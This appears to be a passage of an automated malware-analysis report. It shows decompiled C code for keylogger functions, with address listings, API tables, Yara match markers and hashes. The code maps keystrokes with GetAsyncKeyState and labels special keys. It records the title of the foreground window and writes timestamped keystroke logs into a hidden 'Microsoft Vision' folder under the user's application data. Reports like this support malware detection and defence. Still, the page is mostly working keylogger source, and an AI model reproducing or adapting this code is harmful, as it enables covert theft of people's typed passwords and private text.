										_t49 =  &_v56;
										goto L99;
									}
									if(__eflags == 0) {
										_t27 = GetAsyncKeyState(0x10);
										_t50 = "{";
										_t55 = "[";
										goto L76;
									}
									_t62 = _t58 - 0xbd;
									__eflags = _t62;
									if(_t62 == 0) {
										_t27 = GetAsyncKeyState(0x10);
										_t50 = "_";
										_t55 = "-";
										goto L76;
									}
									_t63 = _t62 - 1;
									__eflags = _t63;
									if(_t63 == 0) {
										_t27 = GetAsyncKeyState(0x10);
										_t50 = ">";
										_t55 = ".";
										goto L76;
									}
									_t64 = _t63 - 1;
									__eflags = _t64;
									if(_t64 == 0) {
										_t27 = GetAsyncKeyState(0x10);
										_t50 = "?";
										_t55 = "/";
										goto L76;
									}
									__eflags = _t64 - 1;
									if(__eflags != 0) {
										goto L94;
									}
									_t27 = GetAsyncKeyState(0x10);
									_t50 = "~";
									_t55 = "`";
									goto L76;
								}
								if(__eflags == 0) {
									_t27 = GetAsyncKeyState(0x10);
									_t50 = "<";
									_t55 = ",";
									goto L76;
								}
								__eflags = _t58 - 0xa3;
								if(_t58 > 0xa3) {
									__eflags = _t58 - 0xa5;
									if(__eflags <= 0) {
										L78:
										_t49 = L"[ALT]";
										goto L99;
									}
									__eflags = _t58 - 0xba;
									if(_t58 == 0xba) {
										_t27 = GetAsyncKeyState(0x10);
										_t50 = ":";
										_t55 = ";";
										goto L76;
									}
									__eflags = _t58 - 0xbb;
									if(__eflags != 0) {
										goto L94;
									}
									_t27 = GetAsyncKeyState(0x10);
									_t50 = "+";
									_t55 = "=";
									goto L76;
								}
								__eflags = _t58 - 0xa2;
								if(__eflags >= 0) {
									L71:
									_t49 = L"[CTRL]";
									goto L99;
								}
								__eflags = _t58 - 0x67;
								if(__eflags == 0) {
									_t49 = "7";
									goto L99;
								}
								__eflags = _t58 - 0x68;
								if(__eflags == 0) {
									_t49 = "8";
									goto L99;
								}
								__eflags = _t58 - 0x69;
								if(__eflags == 0) {
									_t49 = "9";
									goto L99;
								}
								__eflags = _t58 - 0xa0 - 1;
								if(__eflags > 0) {
									goto L94;
								}
								goto L100;
							}
							if(__eflags == 0) {
								_t49 = "6";
								goto L99;
							}
							__eflags = _t58 - 0x20;
							if(__eflags > 0) {
								__eflags = _t58 - 0x62;
								if(__eflags > 0) {
									_t66 = _t58 - 0x63;
									__eflags = _t66;
									if(__eflags == 0) {
										_t49 = "3";
										goto L99;
									}
									_t67 = _t66 - 1;
									__eflags = _t67;
									if(__eflags == 0) {
										_t49 = "4";
										goto L99;
									}
									__eflags = _t67 - 1;
									if(__eflags != 0) {
										goto L94;
									}
									_t49 = "5";
									goto L99;
								}
								if(__eflags == 0) {
									_t49 = "2";
									goto L99;
								}
								_t69 = _t58 - 0x2d;
								__eflags = _t69;
								if(__eflags == 0) {
									_t49 = L"[INSERT]";
									goto L99;
								}
								_t70 = _t69 - 1;
								__eflags = _t70;
								if(__eflags == 0) {
									_t49 = L"[DEL]";
									goto L99;
								}
								_t71 = _t70 - 0x32;
								__eflags = _t71;
								if(__eflags == 0) {
									_t49 = "0";
									goto L99;
								}
								__eflags = _t71 - 1;
								if(__eflags != 0) {
									goto L94;
								}
								_t49 = "1";
								goto L99;
							}
							if(__eflags == 0) {
								_t49 = " ";
								goto L99;
							}
							__eflags = _t58 - 0x11;
							if(__eflags > 0) {
								_t73 = _t58 - 0x12;
								__eflags = _t73;
								if(__eflags == 0) {
									goto L78;
								}
								_t75 = _t73;
								__eflags = _t75;
								if(__eflags == 0) {
									_t49 = L"[CAPS]";
									goto L99;
								}
								__eflags = _t75 - 7;
								if(__eflags != 0) {
									goto L94;
								}
								_t49 = L"[ESC]";
								goto L99;
							}
							if(__eflags == 0) {
								goto L71;
							}
							_t77 = _t58 - 8;
							__eflags = _t77;
							if(__eflags == 0) {
								_t49 = L"[BKSP]";
								goto L99;
							}
							_t78 = _t77 - 1;
							__eflags = _t78;
							if(__eflags == 0) {
								_t49 = L"[TAB]";
								goto L99;
							}
							_t79 = _t78 - 4;
							__eflags = _t79;
							if(__eflags == 0) {
								_t49 = L"[ENTER]\r\n";
								goto L99;
							}
							__eflags = _t79 - 3;
							if(__eflags == 0) {
								goto L100;
							}
							goto L94;
						}
						L19:
						__eflags = _t58 - 0x5b;
						if(_t58 >= 0x5b) {
							goto L21;
						}
						_t36 = E004085C0();
						__eflags = GetAsyncKeyState(0x10);
						__eflags = E004085AE(_t48 & 0xffffff00 | GetAsyncKeyState(0x10) != 0x00000000, _t36);
						_t53 =  !=  ? _t58 : _t58 + 0x20;
						wsprintfW( &_v24, L"%c",  !=  ? _t58 : _t58 + 0x20);
						E004085CB( &_v24, _t36, __eflags);
						_t46 = _v8;
						goto L100;
					}
					if(_t58 > 0x40) {
						goto L19;
					}
					if(GetAsyncKeyState(0x10) == 0) {
						wsprintfW( &_v24, L"%c", _t58);
						_t49 =  &_v24;
						goto L99;
					}
					_t81 = _t58 + 0xffffffd0;
					_t90 = _t81 - 9;
					if(_t81 > 9) {
						goto L100;
					}
					switch( *((intOrPtr*)(_t81 * 4 +  &M00408586))) {
						case 0:
							_t49 = ")";
							goto L99;
						case 1:
							__ecx = "!";
							goto L99;
						case 2:
							__ecx = "@";
							goto L99;
						case 3:
							__ecx = "#";
							goto L99;
						case 4:
							__ecx = "$";
							goto L99;
						case 5:
							__ecx = "%";
							goto L99;
						case 6:
							__ecx = "^";
							goto L99;
						case 7:
							__ecx = "&";
							goto L99;
						case 8:
							__ecx = "*";
							goto L99;
						case 9:
							__ecx = "(";
							goto L99;
					}
				} else {
					L100:
					return CallNextHookEx(0, _t46, _v12, _t57);
				}
			}

































                                  0x0040813a
                                  0x0040813a
                                  0x00408143
                                  0x00408146
                                  0x00408149
                                  0x0040814d
                                  0x00408150
                                  0x00408155
                                  0x00408160
                                  0x00408165
                                  0x00408213
                                  0x00408216
                                  0x00408264
                                  0x00408264
                                  0x00408267
                                  0x00408387
                                  0x00408389
                                  0x00408460
                                  0x00408462
                                  0x004084f5
                                  0x004084f5
                                  0x004084fb
                                  0x00408556
                                  0x0040855c
                                  0x00408561
                                  0x00408564
                                  0x00408566
                                  0x00408566
                                  0x0040856b
                                  0x0040856b
                                  0x00000000
                                  0x0040856b
                                  0x004084fd
                                  0x004084fd
                                  0x00408500
                                  0x0040853f
                                  0x00408545
                                  0x0040854a
                                  0x0040841e
                                  0x0040841e
                                  0x00408421
                                  0x00000000
                                  0x00408421
                                  0x00408502
                                  0x00408505
                                  0x00408528
                                  0x0040852e
                                  0x00408533
                                  0x00000000
                                  0x00408533
                                  0x00408507
                                  0x0040851b
                                  0x00408521
                                  0x00000000
                                  0x00408521
                                  0x00408468
                                  0x004084e0
                                  0x004084e6
                                  0x004084eb
                                  0x00000000
                                  0x004084eb
                                  0x0040846a
                                  0x0040846a
                                  0x00408470
                                  0x004084c9
                                  0x004084cf
                                  0x004084d4
                                  0x00000000
                                  0x004084d4
                                  0x00408472
                                  0x00408472
                                  0x00408475
                                  0x004084b2
                                  0x004084b8
                                  0x004084bd
                                  0x00000000
                                  0x004084bd
                                  0x00408477
                                  0x00408477
                                  0x0040847a
                                  0x0040849b
                                  0x004084a1
                                  0x004084a6
                                  0x00000000
                                  0x004084a6
                                  0x0040847c
                                  0x0040847f
                                  0x00000000
                                  0x00000000
                                  0x00408487
                                  0x0040848d
                                  0x00408492
                                  0x00000000
                                  0x00408492
                                  0x0040838f
                                  0x00408449
                                  0x0040844f
                                  0x00408454
                                  0x00000000
                                  0x00408454
                                  0x00408395
                                  0x0040839b
                                  0x004083f0
                                  0x004083f6
                                  0x0040843d
                                  0x0040843d
                                  0x00000000
                                  0x0040843d
                                  0x004083f8
                                  0x004083fe
                                  0x0040842b
                                  0x00408431
                                  0x00408436
                                  0x00000000
                                  0x00408436
                                  0x00408400
                                  0x00408406
                                  0x00000000
                                  0x00000000
                                  0x0040840e
                                  0x00408414
                                  0x00408419
                                  0x00000000
                                  0x00408419
                                  0x0040839d
                                  0x004083a3
                                  0x004083e6
                                  0x004083e6
                                  0x00000000
                                  0x004083e6
                                  0x004083a5
                                  0x004083a8
                                  0x004083dc
                                  0x00000000
                                  0x004083dc
                                  0x004083aa
                                  0x004083ad
                                  0x004083d2
                                  0x00000000
                                  0x004083d2
                                  0x004083af
                                  0x004083b2
                                  0x004083c8
                                  0x00000000
                                  0x004083c8
                                  0x004083ba
                                  0x004083bd
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004083c3
                                  0x0040826d
                                  0x00408378
                                  0x00000000
                                  0x00408378
                                  0x00408273
                                  0x00408276
                                  0x004082f6
                                  0x004082f9
                                  0x00408347
                                  0x00408347
                                  0x0040834a
                                  0x0040836e
                                  0x00000000
                                  0x0040836e
                                  0x0040834c
                                  0x0040834c
                                  0x0040834f
                                  0x00408364
                                  0x00000000
                                  0x00408364
                                  0x00408351
                                  0x00408354
                                  0x00000000
                                  0x00000000
                                  0x0040835a
                                  0x00000000
                                  0x0040835a
                                  0x004082fb
                                  0x0040833d
                                  0x00000000
                                  0x0040833d
                                  0x004082fd
                                  0x004082fd
                                  0x00408300
                                  0x00408333
                                  0x00000000
                                  0x00408333
                                  0x00408302
                                  0x00408302
                                  0x00408305
                                  0x00408329
                                  0x00000000
                                  0x00408329
                                  0x00408307
                                  0x00408307
                                  0x0040830a
                                  0x0040831f
                                  0x00000000
                                  0x0040831f
                                  0x0040830c
                                  0x0040830f
                                  0x00000000
                                  0x00000000
                                  0x00408315
                                  0x00000000
                                  0x00408315
                                  0x00408278
                                  0x004082ec
                                  0x00000000
                                  0x004082ec
                                  0x0040827a
                                  0x0040827d
                                  0x004082c0
                                  0x004082c0
                                  0x004082c3
                                  0x00000000
                                  0x00000000
                                  0x004082ca
                                  0x004082ca
                                  0x004082cd
                                  0x004082e2
                                  0x00000000
                                  0x004082e2
                                  0x004082cf
                                  0x004082d2
                                  0x00000000
                                  0x00000000
                                  0x004082d8
                                  0x00000000
                                  0x004082d8
                                  0x0040827f
                                  0x00000000
                                  0x00000000
                                  0x00408285
                                  0x00408285
                                  0x00408288
                                  0x004082b6
                                  0x00000000
                                  0x004082b6
                                  0x0040828a
                                  0x0040828a
                                  0x0040828d
                                  0x004082ac
                                  0x00000000
                                  0x004082ac
                                  0x0040828f
                                  0x0040828f
                                  0x00408292
                                  0x004082a2
                                  0x00000000
                                  0x004082a2
                                  0x00408294
                                  0x00408297
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040829d
                                  0x00408218
                                  0x00408218
                                  0x0040821b
                                  0x00000000
                                  0x00000000
                                  0x0040821d
                                  0x0040822c
                                  0x00408239
                                  0x00408241
                                  0x0040824b
                                  0x00408257
                                  0x0040825c
                                  0x00000000
                                  0x0040825c
                                  0x0040816e
                                  0x00000000
                                  0x00000000
                                  0x0040817f
                                  0x00408202
                                  0x0040820b
                                  0x00000000
                                  0x0040820b
                                  0x00408181
                                  0x00408184
                                  0x00408187
                                  0x00000000
                                  0x00000000
                                  0x0040818d
                                  0x00000000
                                  0x00408194
                                  0x00000000
                                  0x00000000
                                  0x0040819e
                                  0x00000000
                                  0x00000000
                                  0x004081a8
                                  0x00000000
                                  0x00000000
                                  0x004081b2
                                  0x00000000
                                  0x00000000
                                  0x004081bc
                                  0x00000000
                                  0x00000000
                                  0x004081c6
                                  0x00000000
                                  0x00000000
                                  0x004081d0
                                  0x00000000
                                  0x00000000
                                  0x004081da
                                  0x00000000
                                  0x00000000
                                  0x004081e4
                                  0x00000000
                                  0x00000000
                                  0x004081ee
                                  0x00000000
                                  0x00000000
                                  0x00408570
                                  0x00408570
                                  0x00408581
                                  0x00408581

                                  APIs
                                  • GetAsyncKeyState.USER32 ref: 00408176
                                  • CallNextHookEx.USER32 ref: 00408577
                                    • Part of subcall function 004085CB: GetForegroundWindow.USER32 ref: 004085F4
                                    • Part of subcall function 004085CB: GetWindowTextW.USER32 ref: 00408607
                                    • Part of subcall function 004085CB: lstrlenW.KERNEL32(-00000210,{Unknown},?,?), ref: 00408670
                                    • Part of subcall function 004085CB: CreateFileW.KERNEL32(?,00000004,00000001,00000000,00000004,00000080,00000000), ref: 004086DE
                                    • Part of subcall function 004085CB: lstrlenW.KERNEL32(00417A60,00000008,00000000,?,?), ref: 00408707
                                    • Part of subcall function 004085CB: WriteFile.KERNEL32(?,00417A60,00000000,?,?), ref: 00408713
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: FileWindowlstrlen$AsyncCallCreateForegroundHookNextStateTextWrite
                                  • String ID: [ALT]$[BKSP]$[CAPS]$[CTRL]$[DEL]$[ENTER]$[ESC]$[INSERT]$[TAB]
                                  • API String ID: 2452648998-4143582258
                                  • Opcode ID: 881548f72cfd94900db163d355712600b34b549d501f703e75189cd75d0e76ec
                                  • Instruction ID: 005c92b7aa13bd5785e0d60a0273475475fd8f33417f3dbf942b8c71a30de329
                                  • Opcode Fuzzy Hash: 881548f72cfd94900db163d355712600b34b549d501f703e75189cd75d0e76ec
                                  • Instruction Fuzzy Hash: 0791C132A4C910ABCB1892288F586BA2531A7917A4F10C17FD9C3B77D1DF7C9E82524F
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00408793, Relevance: 40.5, APIs: 22, Strings: 1, Instructions: 277registrystringwindowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 85%
                                  			E00408793(void* __ecx, void* __eflags, struct HWND__* _a4, int _a8, int _a12, long _a16) {
				char _v524;
				short _v564;
				intOrPtr _v568;
				short _v570;
				short _v572;
				long _v596;
				char _v600;
				int _v604;
				char _v612;
				intOrPtr _v616;
				struct _OVERLAPPED* _v620;
				char _v624;
				char _v628;
				void* _v632;
				char _v636;
				intOrPtr _v640;
				struct _OVERLAPPED* _v644;
				char _v648;
				void* _t76;
				short _t77;
				void* _t82;
				char* _t84;
				struct _OVERLAPPED** _t86;
				long _t88;
				intOrPtr _t93;
				intOrPtr* _t96;
				long _t100;
				intOrPtr _t101;
				WCHAR* _t102;
				intOrPtr _t104;
				void* _t105;
				long _t109;
				void* _t110;
				intOrPtr _t111;
				intOrPtr _t113;
				long _t116;
				intOrPtr _t117;
				intOrPtr _t119;
				long _t121;
				intOrPtr _t122;
				intOrPtr _t124;
				void* _t126;
				intOrPtr _t128;
				intOrPtr _t130;
				long _t132;
				intOrPtr _t133;
				intOrPtr _t135;
				DWORD* _t136;
				long _t137;
				intOrPtr _t138;
				long _t142;
				void* _t152;
				long _t164;
				intOrPtr _t178;
				intOrPtr _t189;
				void* _t195;
				struct _OVERLAPPED* _t198;
				struct _OVERLAPPED* _t201;
				void* _t204;
				void* _t206;
				void* _t208;
				signed int _t209;
				void* _t212;
				void* _t213;

				_t198 = 0;
				_v600 = 0;
				E00401052( &_v524, 0, 0x208);
				_t212 = (_t209 & 0xfffffff8) - 0x25c + 0xc;
				_t201 = 0;
				_v604 = 0;
				_t76 = _a8 - 1;
				if(_t76 == 0) {
					_t77 = 6;
					_v570 = _t77;
					__eflags = 1;
					_v564 = _a4;
					_v568 = 0x130;
					_v572 = 1;
					__imp__RegisterRawInputDevices( &_v572, 1, 0xc);
				} else {
					_t82 = _t76 - 0xf;
					if(_t82 == 0) {
						PostQuitMessage(0);
					} else {
						if(_t82 == 0xef) {
							_t84 =  &_v600;
							__imp__GetRawInputData(_a16, 0x10000003, 0, _t84, 0x10);
							__eflags = _t84 - 0xffffffff;
							if(_t84 != 0xffffffff) {
								_t164 = E00406099(_v620);
								_v596 = _t164;
								__eflags = _t164;
								if(_t164 != 0) {
									_t86 =  &_v620;
									__imp__GetRawInputData(_a16, 0x10000003, _t164, _t86, 0x10);
									__eflags = _t86 - _v640;
									if(_t86 == _v640) {
										__eflags =  *((intOrPtr*)(_t164 + 0x18)) - 0x100;
										if( *((intOrPtr*)(_t164 + 0x18)) == 0x100) {
											_t88 = GetWindowTextW(GetForegroundWindow(),  &_v564, 0x104);
											__eflags = _t88;
											if(_t88 <= 0) {
												E00403411( &_v644, _t195, L"Unknow");
											} else {
												E00403549( &_v648, E004036F7( &_v636,  &_v564));
												E00405FEB(_v644);
											}
											E00408C13( &_v632,  *((intOrPtr*)(_t164 + 0x16)));
											E00403549( &_v632,  &_v644);
											_t93 =  *0x42675c; // 0x0
											E0040357C( &_v624,  *((intOrPtr*)(_t164 + 0x16)), __eflags, _t93 + 0x10);
											_t96 =  *0x42675c; // 0x0
											__eflags =  *_t96 - _t198;
											if( *_t96 != _t198) {
												_t213 = _t212 - 0x10;
												__eflags = _t96 + 0xa18;
												E004013B3(_t213, _t96 + 0xa18, _t96 + 0xa18);
												_t208 = _t213 - 0x10;
												E0040373F(_t208,  &_v636);
												 *((intOrPtr*)(_t208 + 4)) = _v636;
												 *((short*)(_t208 + 8)) = _v632;
												E0040373F(_t208 + 0xc,  &_v628);
												_t152 = E00404A78( &_v612, __eflags);
												_t189 =  *0x42675c; // 0x0
												E00405044( *((intOrPtr*)(_t189 + 0xa50)), _t152);
												E00404A4E( &_v648);
												_t96 =  *0x42675c; // 0x0
											}
											__eflags =  *((intOrPtr*)(_t96 + 0xa14)) - _t198;
											if( *((intOrPtr*)(_t96 + 0xa14)) != _t198) {
												_t100 = lstrlenW(_t96 + 0x210);
												__eflags = _t100;
												_t101 =  *0x42675c; // 0x0
												if(_t100 == 0) {
													L17:
													_t102 = _t101 + 0x210;
													__eflags = _t102;
													lstrcpyW(_t102, _v632);
													_t104 =  *0x42675c; // 0x0
													 *(_t104 + 0xa10) = _t198;
												} else {
													_t142 = E0040335A( &_v648, E004036F7( &_v636, _t101 + 0x210));
													E00405FEB(_v644);
													_t101 =  *0x42675c; // 0x0
													_v644 = _t198;
													__eflags = _t142;
													if(_t142 == 0) {
														goto L17;
													} else {
														 *((intOrPtr*)(_t101 + 0xa10)) = 1;
													}
												}
												_t105 = CreateFileW( *(_t104 + 0xc), 4, 1, _t198, 4, 0x80, _t198);
												_t178 =  *0x42675c; // 0x0
												 *(_t178 + 4) = _t105;
												__eflags =  *((intOrPtr*)(_t178 + 0xa10)) - _t198;
												if(__eflags == 0) {
													_t49 = _t178 + 8; // 0x8
													_t204 = L"\r\n";
													_t116 = lstrlenW(_t204);
													_t117 =  *0x42675c; // 0x0
													WriteFile( *(_t117 + 4), _t204, _t116, _t49, _t198);
													_t119 =  *0x42675c; // 0x0
													_t121 = lstrlenW(_t204);
													_t122 =  *0x42675c; // 0x0
													WriteFile( *(_t122 + 4), _t204, _t121, _t119 + 8, _t198);
													_t124 =  *0x42675c; // 0x0
													_t126 = E00403373( &_v632);
													_t128 =  *0x42675c; // 0x0
													WriteFile( *(_t128 + 4), _v632, _t126 + _t126, _t124 + 8, _t198);
													_t130 =  *0x42675c; // 0x0
													_t206 = L"\r\n";
													_t132 = lstrlenW(_t206);
													_t133 =  *0x42675c; // 0x0
													WriteFile( *(_t133 + 4), _t206, _t132, _t130 + 8, _t198);
													_t135 =  *0x42675c; // 0x0
													_t136 = _t135 + 8;
													__eflags = _t136;
													_t137 = lstrlenW(_t206);
													_t138 =  *0x42675c; // 0x0
													WriteFile( *(_t138 + 4), _t206, _t137, _t136, _t198);
													_t178 =  *0x42675c; // 0x0
												}
												_t58 = _t178 + 8; // 0x8
												_t109 = lstrlenW(E00408B2D( *((intOrPtr*)(_v616 + 0x16)), __eflags)) + _t108;
												__eflags = _t109;
												_t110 = E00408B2D( *((intOrPtr*)(_v616 + 0x16)), _t109);
												_t111 =  *0x42675c; // 0x0
												WriteFile( *(_t111 + 4), _t110, _t109, _t58, _t198);
												_t113 =  *0x42675c; // 0x0
												CloseHandle( *(_t113 + 4));
											}
											E00405FEB(_v620);
											_v620 = _t198;
											E00405FEB(_v632);
											_t201 = _v644;
										}
									}
								}
							}
						} else {
							_t198 = DefWindowProcA(_a4, _a8, _a12, _a16);
						}
					}
				}
				E00405FEB(_t201);
				return _t198;
			}



































































                                  0x004087a2
                                  0x004087af
                                  0x004087b3
                                  0x004087bb
                                  0x004087be
                                  0x004087c0
                                  0x004087c4
                                  0x004087c7
                                  0x00408af0
                                  0x00408af3
                                  0x00408afb
                                  0x00408afe
                                  0x00408b08
                                  0x00408b10
                                  0x00408b15
                                  0x004087cd
                                  0x004087cd
                                  0x004087d0
                                  0x00408ae6
                                  0x004087d6
                                  0x004087db
                                  0x004087f8
                                  0x00408806
                                  0x0040880c
                                  0x0040880f
                                  0x0040881e
                                  0x00408820
                                  0x00408824
                                  0x00408826
                                  0x0040882e
                                  0x0040883c
                                  0x00408842
                                  0x00408846
                                  0x0040884c
                                  0x00408853
                                  0x0040886a
                                  0x00408870
                                  0x00408872
                                  0x004088a0
                                  0x00408874
                                  0x00408887
                                  0x00408890
                                  0x00408890
                                  0x004088ac
                                  0x004088ba
                                  0x004088bf
                                  0x004088cc
                                  0x004088d1
                                  0x004088d6
                                  0x004088d8
                                  0x004088da
                                  0x004088dd
                                  0x004088e5
                                  0x004088f1
                                  0x004088f6
                                  0x00408902
                                  0x0040890a
                                  0x00408913
                                  0x0040891c
                                  0x00408921
                                  0x0040892e
                                  0x00408937
                                  0x0040893c
                                  0x0040893c
                                  0x00408941
                                  0x00408947
                                  0x00408953
                                  0x0040895c
                                  0x0040895e
                                  0x00408963
                                  0x0040899e
                                  0x004089a2
                                  0x004089a2
                                  0x004089a8
                                  0x004089ae
                                  0x004089b3
                                  0x00408965
                                  0x00408979
                                  0x00408984
                                  0x00408989
                                  0x0040898e
                                  0x00408992
                                  0x00408994
                                  0x00000000
                                  0x00408996
                                  0x00408996
                                  0x00408996
                                  0x00408994
                                  0x004089c8
                                  0x004089ce
                                  0x004089da
                                  0x004089dd
                                  0x004089e3
                                  0x004089ea
                                  0x004089ed
                                  0x004089f4
                                  0x004089fb
                                  0x00408a04
                                  0x00408a06
                                  0x00408a11
                                  0x00408a18
                                  0x00408a21
                                  0x00408a23
                                  0x00408a35
                                  0x00408a3d
                                  0x00408a46
                                  0x00408a48
                                  0x00408a4d
                                  0x00408a58
                                  0x00408a5f
                                  0x00408a68
                                  0x00408a6a
                                  0x00408a70
                                  0x00408a70
                                  0x00408a75
                                  0x00408a7c
                                  0x00408a85
                                  0x00408a87
                                  0x00408a87
                                  0x00408a91
                                  0x00408aa8
                                  0x00408aa8
                                  0x00408aab
                                  0x00408ab1
                                  0x00408ab9
                                  0x00408abb
                                  0x00408ac3
                                  0x00408ac3
                                  0x00408acd
                                  0x00408ad6
                                  0x00408ada
                                  0x00408adf
                                  0x00408adf
                                  0x00408853
                                  0x00408846
                                  0x00408826
                                  0x004087dd
                                  0x004087ef
                                  0x004087ef
                                  0x004087db
                                  0x004087d0
                                  0x00408b1d
                                  0x00408b2a

                                  APIs
                                  • DefWindowProcA.USER32(?,?,?,?), ref: 004087E9
                                  • GetRawInputData.USER32(?,10000003,00000000,?,00000010), ref: 00408806
                                  • GetRawInputData.USER32(?,10000003,00000000,?,00000010), ref: 0040883C
                                  • GetForegroundWindow.USER32 ref: 00408859
                                  • GetWindowTextW.USER32 ref: 0040886A
                                  • lstrlenW.KERNEL32(-00000210,-00000010,?,Unknow), ref: 00408953
                                  • PostQuitMessage.USER32 ref: 00408AE6
                                  • RegisterRawInputDevices.USER32 ref: 00408B15
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: InputWindow$Data$DevicesForegroundMessagePostProcQuitRegisterTextlstrlen
                                  • String ID: Unknow
                                  • API String ID: 3853268301-1240069140
                                  • Opcode ID: 25c54a7e746581c659a04ab4f6f35b0600ec8f05a5dfc5433c8a338663c3b571
                                  • Instruction ID: 458c7b85aa02a6c7404881c9d8865e4587a04225f5986bfff7961e81c5bb117e
                                  • Opcode Fuzzy Hash: 25c54a7e746581c659a04ab4f6f35b0600ec8f05a5dfc5433c8a338663c3b571
                                  • Instruction Fuzzy Hash: BEA18E71204200AFC710EF65DC89EAB7BB8EF84344F44857EF985A72A1DB35D905CB69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00408D0F, Relevance: 33.5, APIs: 16, Strings: 3, Instructions: 214windowstringregistryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 83%
                                  			E00408D0F(void* __ecx, void* __eflags, void* _a4) {
				short _v544;
				char _v696;
				short _v704;
				char _v724;
				struct tagMSG _v748;
				struct _WNDCLASSW _v788;
				struct _SYSTEMTIME _v804;
				char _v808;
				void* _v812;
				long _v816;
				intOrPtr _t46;
				intOrPtr _t49;
				intOrPtr _t52;
				intOrPtr _t54;
				intOrPtr _t57;
				intOrPtr _t60;
				intOrPtr _t65;
				struct HWND__* _t69;
				int _t73;
				intOrPtr _t94;
				void* _t95;
				intOrPtr _t99;
				void* _t107;
				void* _t110;
				struct HINSTANCE__* _t111;
				struct HWND__* _t112;
				void* _t114;
				signed int _t119;
				intOrPtr _t122;
				intOrPtr _t125;
				intOrPtr _t129;
				intOrPtr _t131;
				void* _t132;
				void* _t133;
				void* _t140;
				signed int _t143;
				signed int _t144;
				signed int _t146;
				void* _t150;

				_t114 = __ecx;
				_t111 = GetModuleHandleA(0);
				_v788.hIcon = 0;
				_v804.wSecond = 0;
				asm("xorps xmm0, xmm0");
				asm("stosd");
				asm("movlpd [esp+0x30], xmm0");
				asm("movlpd [esp+0x3c], xmm0");
				asm("stosd");
				asm("movlpd [esp+0x44], xmm0");
				asm("stosd");
				asm("stosd");
				_t46 =  *0x42675c; // 0x0
				E00401052(_t46 + 0x210, 0, 0x800);
				_t49 =  *0x42675c; // 0x0
				E00401052(_t49 + 0x10, 0, 0x208);
				_t52 =  *0x42675c; // 0x0
				_t150 = (_t146 & 0xfffffff8) - 0x314 + 0x18;
				__imp__SHGetFolderPathW(0, 0x1c, 0, 0, _t52 + 0x10, _t133, _t140, _t110);
				_t54 =  *0x42675c; // 0x0
				lstrcatW(_t54 + 0x10, L"\\Microsoft Vision\\");
				_t57 =  *0x42675c; // 0x0
				CreateDirectoryW(_t57 + 0x10, 0);
				_t60 =  *0x42675c; // 0x0
				_t153 =  *((intOrPtr*)(_t60 + 0xa14));
				if( *((intOrPtr*)(_t60 + 0xa14)) != 0) {
					E00401052( &_v544, 0, 0x208);
					_t99 =  *0x42675c; // 0x0
					_t150 = _t150 + 0xc;
					lstrcpyW( &_v544, _t99 + 0x10);
					lstrcatW( &_v544, "*");
					E004036F7(_t150,  &_v544);
					_t107 = E00411446( &_v724, _t153, _t114);
					_t129 =  *0x42675c; // 0x0
					E00401FB7(_t129 + 0xa18, _t153, _t107);
					_t131 = _v748.pt;
					_t154 = _t131;
					if(_t131 != 0) {
						E00401B27(_t131, _t131);
					}
				}
				_t132 = 4;
				_t143 = E004035B9( &_v808, _t132, _t154);
				E00403447(E0040357C( &_v812, _t132, _t154, L"ExplorerIdentifier"), _t154, _t143);
				E00405FEB(_v816);
				_t65 =  *0x42675c; // 0x0
				_v816 = 0;
				if( *((intOrPtr*)(_t65 + 0xa14)) != 0) {
					GetLocalTime( &_v804);
					wsprintfW( &_v704, L"%02d-%02d-%02d_%02d.%02d.%02d", _v804.wDay & 0x0000ffff, _v804.wMonth & 0x0000ffff, _v804.wYear & 0x0000ffff, _v804.wHour & 0x0000ffff, _v804.wMinute & 0x0000ffff, _v804.wSecond & 0x0000ffff);
					_t122 =  *0x42675c; // 0x0
					_t150 = _t150 + 0x20;
					_t26 = _t122 + 0x10; // 0x10
					E0040357C(E0040357C(_t122 + 0xc, _t132, _t122 + 0xc, _t26), _t132, _t122 + 0xc,  &_v696);
					_t94 =  *0x42675c; // 0x0
					_t95 = CreateFileW( *(_t94 + 0xc), 0x10000000, 1, 0, 2, 0x80, 0);
					_t125 =  *0x42675c; // 0x0
					 *(_t125 + 4) = _t95;
					CloseHandle(_t95);
				}
				_v788.lpszClassName = _v812;
				_v788.lpfnWndProc = E00408793;
				_v788.hInstance = _t111;
				RegisterClassW( &_v788);
				_t69 = CreateWindowExW(0, _v788.lpszClassName, 0, 0, 0, 0, 0, 0, 0xfffffffd, 0, _t111, _a4);
				_t119 = 7;
				_t112 = _t69;
				memset( &_v748, 0, _t119 << 2);
				_t73 = GetMessageA( &_v748, _t112, 0, 0);
				if(_t73 == 0) {
					L9:
					_t144 = _v748.wParam;
					goto L10;
				} else {
					_t144 = _t143 | 0xffffffff;
					while(_t73 != _t144) {
						TranslateMessage( &_v748);
						DispatchMessageA( &_v748);
						_t73 = GetMessageA( &_v748, _t112, 0, 0);
						if(_t73 != 0) {
							continue;
						}
						goto L9;
					}
					L10:
					E00405FEB(_v812);
					return _t144;
				}
			}










































                                  0x00408d0f
                                  0x00408d27
                                  0x00408d29
                                  0x00408d2f
                                  0x00408d37
                                  0x00408d3a
                                  0x00408d40
                                  0x00408d46
                                  0x00408d4c
                                  0x00408d4d
                                  0x00408d53
                                  0x00408d54
                                  0x00408d55
                                  0x00408d63
                                  0x00408d68
                                  0x00408d7a
                                  0x00408d7f
                                  0x00408d84
                                  0x00408d90
                                  0x00408d96
                                  0x00408daa
                                  0x00408dac
                                  0x00408db6
                                  0x00408dbc
                                  0x00408dc1
                                  0x00408dc7
                                  0x00408dd7
                                  0x00408ddc
                                  0x00408de1
                                  0x00408df0
                                  0x00408e03
                                  0x00408e10
                                  0x00408e19
                                  0x00408e1f
                                  0x00408e2c
                                  0x00408e31
                                  0x00408e35
                                  0x00408e37
                                  0x00408e3a
                                  0x00408e3a
                                  0x00408e37
                                  0x00408e41
                                  0x00408e54
                                  0x00408e5e
                                  0x00408e67
                                  0x00408e6c
                                  0x00408e71
                                  0x00408e7b
